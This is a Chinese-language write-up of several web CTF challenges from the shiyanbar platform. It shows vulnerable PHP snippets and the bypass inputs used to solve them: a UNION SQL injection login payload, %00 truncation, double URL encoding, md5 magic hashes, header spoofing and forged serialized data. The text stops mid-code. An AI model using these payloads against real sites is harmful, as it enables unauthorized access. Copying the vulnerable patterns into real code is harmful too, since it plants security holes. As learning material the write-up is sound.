<p>Upload: y.jpg<br>Type: image/vnd.microsoft.icon<br>Size: 66.060546875 Kb<br>Stored in: ./uploads/8a9e5f6a7a789acb.php<br>必须上传成后缀名为php的文件才行啊！</p>
</blockquote>
<p>于是在<code>/uploads/</code>处截断为<code>/uploads/1.php截断</code>，提交得到flag</p>
<h2 id="NSCTF-web200"><a href="#NSCTF-web200" class="headerlink" title="NSCTF web200"></a>NSCTF web200</h2><blockquote>
<p>密文：a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws</p>
</blockquote>
<p><img src="http://ctf5.shiyanbar.com/web/web200.jpg" alt="NSCTF web200"><br>可以看到这是一段简单的加密代码，大致的过程就是</p>
<ul>
<li>翻转字符串</li>
<li>for循环遍历字符串 将每个字母的ASCII +1 再转回字符串</li>
<li>在进行base64编码后 翻转字符串 再进行ROT13编码</li>
</ul>
<p>那么我们简单写个脚本逆向下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$encode = base64_decode(strrev(str_rot13(<span class="string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span>)));</div><div class="line"><span class="comment">//echo $encode;</span></div><div class="line"><span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; strlen($encode); $i++) &#123; </div><div class="line">	$_c = substr($encode, $i,<span class="number">1</span>);</div><div class="line">	$__ = ord($_c)<span class="number">-1</span>;</div><div class="line">	$_c = chr($__);</div><div class="line">	$_ = $_.$_c;</div><div class="line">&#125;</div><div class="line">$decode = strrev($_);</div><div class="line"><span class="keyword">echo</span> $decode;</div></pre></td></tr></table></figure></p>
<h2 id="PHP大法"><a href="#PHP大法" class="headerlink" title="PHP大法"></a>PHP大法</h2><blockquote>
<p>注意备份文件</p>
</blockquote>
<p>这个提示 我到最后也没理解有什么作用，打开网页后给出了<code>index.php.txt</code>可以查看源码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>(eregi(<span class="string">"hackerDJ"</span>,$_GET[id])) &#123;</div><div class="line">  <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;not allowed!&lt;/p&gt;"</span>);</div><div class="line">  <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line"></div><div class="line">$_GET[id] = urldecode($_GET[id]);</div><div class="line"><span class="keyword">if</span>($_GET[id] == <span class="string">"hackerDJ"</span>)</div><div class="line">&#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Access granted!&lt;/p&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;flag: *****************&#125; &lt;/p&gt;"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div><div class="line">&lt;br&gt;&lt;br&gt;</div><div class="line">Can you authenticate to this website?</div></pre></td></tr></table></figure></p>
<p>这题以前接触过，采用二次urlencode绕过就行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=%25%36%38%25%36%31%25%36%33%25%36%42%25%36%35%25%37%32%25%34%34%25%34%41</div></pre></td></tr></table></figure></p>
<h3 id="urlencode"><a href="#urlencode" class="headerlink" title="urlencode"></a>urlencode</h3><p>在这边顺便了解了下urlencode的方式</p>
<blockquote>
<p><strong>url编码解码</strong>,又叫百分号编码，是统一资源定位(URL)编码方式。URL地址（常说网址）规定了常用地数字，字母可以直接使用，另外一批作为特殊用户字符也可以直接用（/,:@等），剩下的其它所有字符必须通过%xx编码处理。 现在已经成为一种规范了，基本所有程序语言都有这种编码，<br><strong>编码方法:</strong>在该字节ascii码的的16进制字符前面加%. 如 空格字符，ascii码是32，对应16进制是’20’，那么urlencode编码结果是:%20</p>
</blockquote>
<h2 id="FALSE"><a href="#FALSE" class="headerlink" title="FALSE"></a>FALSE</h2><blockquote>
<p>PHP代码审计<br>hint：sha1函数你有认真了解过吗？听说也有人用md5碰撞o(╯□╰)o</p>
</blockquote>
<p><img src="/images/shiyanbar06false.png" alt="false"><br>利用PHP弱类型特性绕过<br>使得两个直接比较不相等，但是sha1相等，那只能考虑sha1为false的情况了，两个变量加密都是false，自然相等了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">?name[]=a&amp;password[]=b</div></pre></td></tr></table></figure></p>
<h2 id="Forms"><a href="#Forms" class="headerlink" title="Forms"></a>Forms</h2><blockquote>
<p>似乎有人觉得PIN码是不可破解的，让我们证明他是错的。</p>
</blockquote>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">head</span>&gt;</span></div><div class="line">        <span class="tag">&lt;<span class="name">title</span>&gt;</span>Forms<span class="tag">&lt;/<span class="name">title</span>&gt;</span></div><div class="line">    <span class="tag">&lt;/<span class="name">head</span>&gt;</span></div><div class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></div><div class="line">        <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">""</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span></div><div class="line">    PIN:</div><div class="line">            <span class="tag">&lt;<span class="name">br</span>&gt;</span></div><div class="line">            <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"password"</span> <span class="attr">name</span>=<span class="string">"PIN"</span> <span class="attr">value</span>=<span class="string">""</span>&gt;</span></div><div class="line">            <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"showsource"</span> <span class="attr">value</span>=<span class="string">0</span>&gt;</span></div><div class="line">            <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">"submit"</span>&gt;</span>Enter<span class="tag">&lt;/<span class="name">button</span>&gt;</span></div><div class="line">        <span class="tag">&lt;/<span class="name">form</span>&gt;</span></div><div class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></div><div class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></div></pre></td></tr></table></figure>
<p>发现有个隐藏的showsource的参数，猜测应该是显示源码，把value从0改成1。显示源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">$a = $_POST[&quot;PIN&quot;];</div><div class="line">if ($a == -19827747736161128312837161661727773716166727272616149001823847) &#123;</div><div class="line">    echo &quot;Congratulations! The flag is $flag&quot;;</div><div class="line">&#125; else &#123;</div><div class="line">    echo &quot;User with provided PIN not found.&quot;; </div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>于是提交pin为-19827747736161128312837161661727773716166727272616149001823847 得到flag</p>
<h2 id="程序逻辑问题"><a href="#程序逻辑问题" class="headerlink" title="程序逻辑问题"></a>程序逻辑问题</h2><blockquote>
<p>绕过</p>
</blockquote>
<p>打开题目地址，右键源文件发现index.txt访问得到源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div></pre></td><td class="code"><pre><div class="line">&lt;html&gt;</div><div class="line">&lt;head&gt;</div><div class="line">welcome to simplexue</div><div class="line">&lt;/head&gt;</div><div class="line">&lt;body&gt;</div><div class="line">&lt;?php</div><div class="line"></div><div class="line"></div><div class="line">if($_POST[user] &amp;&amp; $_POST[pass]) &#123;</div><div class="line">	$conn = mysql_connect(&quot;********, &quot;*****&quot;, &quot;********&quot;);</div><div class="line">	mysql_select_db(&quot;phpformysql&quot;) or die(&quot;Could not select database&quot;);</div><div class="line">	if ($conn-&gt;connect_error) &#123;</div><div class="line">		die(&quot;Connection failed: &quot; . mysql_error($conn));</div><div class="line">&#125; </div><div class="line">$user = $_POST[user];</div><div class="line">$pass = md5($_POST[pass]);</div><div class="line"></div><div class="line">$sql = &quot;select pw from php where user=&apos;$user&apos;&quot;;</div><div class="line">$query = mysql_query($sql);</div><div class="line">if (!$query) &#123;</div><div class="line">	printf(&quot;Error: %s\n&quot;, mysql_error($conn));</div><div class="line">	exit();</div><div class="line">&#125;</div><div class="line">$row = mysql_fetch_array($query, MYSQL_ASSOC);</div><div class="line">//echo $row[&quot;pw&quot;];</div><div class="line">  </div><div class="line">  if (($row[pw]) &amp;&amp; (!strcasecmp($pass, $row[pw]))) &#123;</div><div class="line">	echo &quot;&lt;p&gt;Logged in! Key:************** &lt;/p&gt;&quot;;</div><div class="line">&#125;</div><div class="line">else &#123;</div><div class="line">    echo(&quot;&lt;p&gt;Log in failure!&lt;/p&gt;&quot;);</div><div class="line">	</div><div class="line">  &#125;</div><div class="line">  </div><div class="line">  </div><div class="line">&#125;</div><div class="line"></div><div class="line">?&gt;</div><div class="line">&lt;form method=post action=index.php&gt;</div><div class="line">&lt;input type=text name=user value=&quot;Username&quot;&gt;</div><div class="line">&lt;input type=password name=pass value=&quot;Password&quot;&gt;</div><div class="line">&lt;input type=submit&gt;</div><div class="line">&lt;/form&gt;</div><div class="line">&lt;/body&gt;</div><div class="line">&lt;a href=&quot;index.txt&quot;&gt;</div><div class="line">&lt;/html&gt;</div></pre></td></tr></table></figure></p>
<p>粗略看一遍，就觉得pwd返回值可控，那么问题就能解决了<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">user提交 isky&apos; union select &apos;9819264afc0a223d29938073d8c2c544&apos; as pwd#</div><div class="line">password提交 isky</div></pre></td></tr></table></figure></p>
<p>得到flag</p>
<h2 id="what-a-fuck-这是什么鬼东西"><a href="#what-a-fuck-这是什么鬼东西" class="headerlink" title="what a fuck!这是什么鬼东西?"></a>what a fuck!这是什么鬼东西?</h2><blockquote>
<p>what a fuck!这是什么鬼东西?</p>
</blockquote>
<p>访问页面 应该是 <a href="http://www.jsfuck.com/" target="_blank" rel="external">JSfuck</a><br>然后在console里执行下 一个弹出框显示密码 提交之</p>
<h2 id="忘记密码了"><a href="#忘记密码了" class="headerlink" title="忘记密码了"></a>忘记密码了</h2><blockquote>
<p>找回密码<br>解题链接： <a href="http://ctf5.shiyanbar.com/10/upload/" target="_blank" rel="external">http://ctf5.shiyanbar.com/10/upload/</a></p>
</blockquote>
<p>这题主要是要注意源代码中<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"admin"</span> <span class="attr">content</span>=<span class="string">"admin@simplexue.com"</span> /&gt;</span></div><div class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"editor"</span> <span class="attr">content</span>=<span class="string">"Vim"</span> /&gt;</span></div></pre></td></tr></table></figure></p>
<p>其中包含了两个要素 第一个点为管理员的邮箱 第二个则提醒了是用vim编辑器编辑的（没注意，看了writeup才知道）<br>vim编辑器在编辑时会有一个临时文件 例 <code>submit.php</code>则有<code>.submit.php.swp</code>，于是访问得<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">........这一行是省略的代码........ </div><div class="line">/* 如果登录邮箱地址不是管理员则 die() 数据库结构 -- </div><div class="line">CREATE TABLE IF NOT EXISTS `user` (</div><div class="line">  `id` int(11) NOT NULL AUTO_INCREMENT,</div><div class="line">  `username` varchar(255) NOT NULL,</div><div class="line">  `email` varchar(255) NOT NULL,</div><div class="line">  `token` int(255) NOT NULL DEFAULT &apos;0&apos;,</div><div class="line">  PRIMARY KEY (`id`)</div><div class="line">) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;</div><div class="line"></div><div class="line">-- -- 转存表中的数据 `user` -- </div><div class="line">INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES (1, &apos;****不可见***&apos;, &apos;***不可见***&apos;, 0); </div><div class="line"></div><div class="line">*/ ........这一行是省略的代码........ </div><div class="line">if(!empty($token)&amp;&amp;!empty($emailAddress))&#123;</div><div class="line">	if(strlen($token)!=10) die(&apos;fail&apos;);</div><div class="line">	if($token!=&apos;0&apos;) die(&apos;fail&apos;);</div><div class="line">	$sql = &quot;SELECT count(*) as num from `user` where token=&apos;$token&apos; AND email=&apos;$emailAddress&apos;&quot;;</div><div class="line">	$r = mysql_query($sql) or die(&apos;db error&apos;);</div><div class="line">	$r = mysql_fetch_assoc($r);</div><div class="line">	$r = $r[&apos;num&apos;];</div><div class="line">	if($r&gt;0)&#123;</div><div class="line">		echo $flag;</div><div class="line">	&#125;else&#123;</div><div class="line">		echo &quot;失败了呀&quot;;</div><div class="line">	&#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>判断token为10位且为0，又见数据库中该字段default为0，那么提交十位且为0的值就ok了<br>提交<code>0e1111111</code>，得到flag</p>
<h2 id="Once-More"><a href="#Once-More" class="headerlink" title="Once More"></a>Once More</h2><blockquote>
<p>啊拉？又是php审计。已经想吐了。<br>hint：ereg()函数有漏洞哩；从小老师就说要用科学的方法来算数。<br>解题链接： <a href="http://ctf5.shiyanbar.com/web/more.php" target="_blank" rel="external">http://ctf5.shiyanbar.com/web/more.php</a></p>
</blockquote>
<p><code>ereg()</code>函数遇到<code>%00</code>会截断（<strong>在地址栏提交</strong>）<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) &#123;</div><div class="line">	<span class="keyword">if</span> (ereg (<span class="string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="string">'password'</span>]) === <span class="keyword">FALSE</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="keyword">echo</span> <span class="string">'&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'</span>;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">else</span> <span class="keyword">if</span> (strlen($_GET[<span class="string">'password'</span>]) &lt; <span class="number">8</span> &amp;&amp; $_GET[<span class="string">'password'</span>] &gt; <span class="number">9999999</span>)</div><div class="line">	&#123;</div><div class="line">		<span class="keyword">if</span> (strpos ($_GET[<span class="string">'password'</span>], <span class="string">'*-*'</span>) !== <span class="keyword">FALSE</span>)</div><div class="line">		&#123;</div><div class="line">			<span class="keyword">die</span>(<span class="string">'Flag: '</span> . $flag);</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">else</span></div><div class="line">		&#123;</div><div class="line">			<span class="keyword">echo</span>(<span class="string">'&lt;p&gt;*-* have not been found&lt;/p&gt;'</span>);</div><div class="line">		&#125;</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">else</span></div><div class="line">	&#123;</div><div class="line">		<span class="keyword">echo</span> <span class="string">'&lt;p&gt;Invalid password&lt;/p&gt;'</span>;</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<ul>
<li>要求大小写字母和数字 –&gt; 前面字母后面用<code>%00</code>截断</li>
<li>大于9999999 –&gt; 1e8</li>
<li>包含<code>*-*</code></li>
</ul>
<p>于是地址栏提交，得到flag<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://ctf5.shiyanbar.com/web/more.php?password=1e8%00*-*</div></pre></td></tr></table></figure></p>
<h2 id="天网管理系统"><a href="#天网管理系统" class="headerlink" title="天网管理系统"></a>天网管理系统</h2><blockquote>
<p>天网你敢来挑战嘛<br>解题链接：<a href="http://ctf5.shiyanbar.com/10/web1/" target="_blank" rel="external">http://ctf5.shiyanbar.com/10/web1/</a></p>
</blockquote>
<p>查看源代码发现<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;!-- $test=$_GET[&apos;username&apos;]; $test=md5($test); if($test==&apos;0&apos;) --&gt;</div></pre></td></tr></table></figure></p>
<p>对提交的username加密，加密后和0做比较，于是提交<code>QNKCDZO</code>，该字符串加密后为<code>0e830400451993494058024219903391</code>与0做<code>==</code>比较会返回相等，页面出现<code>/user.php?fame=hjkleffifer</code>放入地址栏访问，得</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">$unserialize_str = $_POST[<span class="string">'password'</span>];</div><div class="line">$data_unserialize = unserialize($unserialize_str);</div><div class="line"><span class="keyword">if</span>($data_unserialize[<span class="string">'user'</span>] == <span class="string">'???'</span> &amp;&amp; $data_unserialize[<span class="string">'pass'</span>]==<span class="string">'???'</span>)</div><div class="line">&#123;</div><div class="line">   print_r($flag);</div><div class="line">&#125;</div><div class="line">伟大的科学家php方言道：成也布尔，败也布尔。</div><div class="line">回去吧骚年</div></pre></td></tr></table></figure>
<p>根据页面里的提示，很快想到让<code>$data_unserialize[&#39;user&#39;]</code>的值为<code>true</code>，与字符串比较还是为真，于是本地构造下序列化后的字符串为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">a:2:&#123;s:4:&quot;user&quot;;b:1;s:4:&quot;pass&quot;;b:1;&#125;</div></pre></td></tr></table></figure></p>
<p>最后提交用户名为该序列化字符串，密码为<code>QNKCDZO</code>，得到flag</p>
<h2 id="貌似有点难"><a href="#貌似有点难" class="headerlink" title="貌似有点难"></a>貌似有点难</h2><blockquote>
<p>不多说，去看题目吧。<br>解题链接： <a href="http://ctf5.shiyanbar.com/phpaudit/" target="_blank" rel="external">http://ctf5.shiyanbar.com/phpaudit/</a></p>
</blockquote>
<p>有源码可以查看<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetIP</span><span class="params">()</span></span>&#123;</div><div class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"HTTP_CLIENT_IP"</span>]))</div><div class="line">	$cip = $_SERVER[<span class="string">"HTTP_CLIENT_IP"</span>];</div><div class="line"><span class="keyword">else</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"HTTP_X_FORWARDED_FOR"</span>]))</div><div class="line">	$cip = $_SERVER[<span class="string">"HTTP_X_FORWARDED_FOR"</span>];</div><div class="line"><span class="keyword">else</span> <span class="keyword">if</span>(!<span class="keyword">empty</span>($_SERVER[<span class="string">"REMOTE_ADDR"</span>]))</div><div class="line">	$cip = $_SERVER[<span class="string">"REMOTE_ADDR"</span>];</div><div class="line"><span class="keyword">else</span></div><div class="line">	$cip = <span class="string">"0.0.0.0"</span>;</div><div class="line"><span class="keyword">return</span> $cip;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$GetIPs = GetIP();</div><div class="line"><span class="keyword">if</span> ($GetIPs==<span class="string">"1.1.1.1"</span>)&#123;</div><div class="line"><span class="keyword">echo</span> <span class="string">"Great! Key is *********"</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span>&#123;</div><div class="line"><span class="keyword">echo</span> <span class="string">"错误！你的IP不在访问列表之内！"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>简单伪造个<code>X-FORWARDED-FOR: 1.1.1.1</code>的IP访问得到flag</p>
<h2 id="头有点大"><a href="#头有点大" class="headerlink" title="头有点大"></a>头有点大</h2><blockquote>
<p>提示都这么多了，再提示就没意思了。<br>解题链接： <a href="http://ctf5.shiyanbar.com/sHeader/" target="_blank" rel="external">http://ctf5.shiyanbar.com/sHeader/</a> </p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">Forbidden</div><div class="line"> </div><div class="line"> </div><div class="line">You don&apos;t have permission to access / on this server.</div><div class="line"></div><div class="line">Please make sure you have installed .net framework 9.9!</div><div class="line"></div><div class="line">Make sure you are in the region of England and browsing this site with Internet Explorer</div></pre></td></tr></table></figure>
<p>根据提示，可以看出是要修改http header来达到那些条件，分别是</p>
<ul>
<li>安装.net framework 9.9!</li>
<li>England</li>
<li>IE浏览器访问 </li>
</ul>
<figure class="highlight http"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 9.9)</div><div class="line"><span class="attribute">Accept-Language</span>: en-gb</div></pre></td></tr></table></figure>
<p>这个Accept-Language一开始用en试了好久，都不行，原来要用en-gb……</p>
<h2 id="猫抓老鼠"><a href="#猫抓老鼠" class="headerlink" title="猫抓老鼠"></a>猫抓老鼠</h2><blockquote>
<p>catch！catch！catch！嘿嘿，不多说了，再说剧透了<br>解题链接： <a href="http://ctf5.shiyanbar.com/basic/catch/" target="_blank" rel="external">http://ctf5.shiyanbar.com/basic/catch/</a> </p>
</blockquote>
<p>访问发现header里面有个<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">Content-Row:MTUwNzE3MDYxNA==</div></pre></td></tr></table></figure></p>
<p>不用解密直接提交得到flag……</p>
<h2 id="拐弯抹角"><a href="#拐弯抹角" class="headerlink" title="拐弯抹角"></a>拐弯抹角</h2><blockquote>
<p>如何欺骗服务器，才能拿到Flag？<br>解题链接： <a href="http://ctf5.shiyanbar.com/10/indirection/" target="_blank" rel="external">http://ctf5.shiyanbar.com/10/indirection/</a></p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"><span class="comment">// code by SEC@USTC </span></div><div class="line"></div><div class="line"><span class="keyword">echo</span> <span class="string">'&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="charset" content="gbk"&gt;&lt;/head&gt;&lt;body&gt;'</span>; </div><div class="line"></div><div class="line">$URL = $_SERVER[<span class="string">'REQUEST_URI'</span>]; </div><div class="line"><span class="comment">//echo 'URL: '.$URL.'&lt;br/&gt;'; </span></div><div class="line">$flag = <span class="string">"CTF&#123;???&#125;"</span>; </div><div class="line"></div><div class="line">$code = str_replace($flag, <span class="string">'CTF&#123;???&#125;'</span>, file_get_contents(<span class="string">'./index.php'</span>)); </div><div class="line">$stop = <span class="number">0</span>; </div><div class="line"></div><div class="line"><span class="comment">//这道题目本身也有教学的目的 </span></div><div class="line"><span class="comment">//第一，我们可以构造 /indirection/a/../ /indirection/./ 等等这一类的 </span></div><div class="line"><span class="comment">//所以，第一个要求就是不得出现 ./ </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; strpos($URL, <span class="string">'./'</span>) !== <span class="keyword">FALSE</span>)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">1</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第二，我们可以构造 \ 来代替被过滤的 / </span></div><div class="line"><span class="comment">//所以，第二个要求就是不得出现 ../ </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; strpos($URL, <span class="string">'\\'</span>) !== <span class="keyword">FALSE</span>)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">2</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第三，有的系统大小写通用，例如 indirectioN/ </span></div><div class="line"><span class="comment">//你也可以用?和#等等的字符绕过，这需要统一解决 </span></div><div class="line"><span class="comment">//所以，第三个要求对可以用的字符做了限制，a-z / 和 . </span></div><div class="line">$matches = <span class="keyword">array</span>(); </div><div class="line">preg_match(<span class="string">'/^([0-9a-z\/.]+)$/'</span>, $URL, $matches); </div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; <span class="keyword">empty</span>($matches) || $matches[<span class="number">1</span>] != $URL)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">3</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第四，多个 / 也是可以的 </span></div><div class="line"><span class="comment">//所以，第四个要求是不得出现 // </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; strpos($URL, <span class="string">'//'</span>) !== <span class="keyword">FALSE</span>)&#123; </div><div class="line">    $flag = <span class="string">""</span>; </div><div class="line">    $stop = <span class="number">4</span>;        <span class="comment">//Pass </span></div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="comment">//第五，显然加上index.php或者减去index.php都是可以的 </span></div><div class="line"><span class="comment">//所以我们下一个要求就是必须包含/index.php，并且以此结尾 </span></div><div class="line"><span class="keyword">if</span>($flag &amp;&amp; substr($URL, <span class="number">-10</span>) !== <span class="string">'/index.php'</span>)&#123; </div><div class="line">    $flag 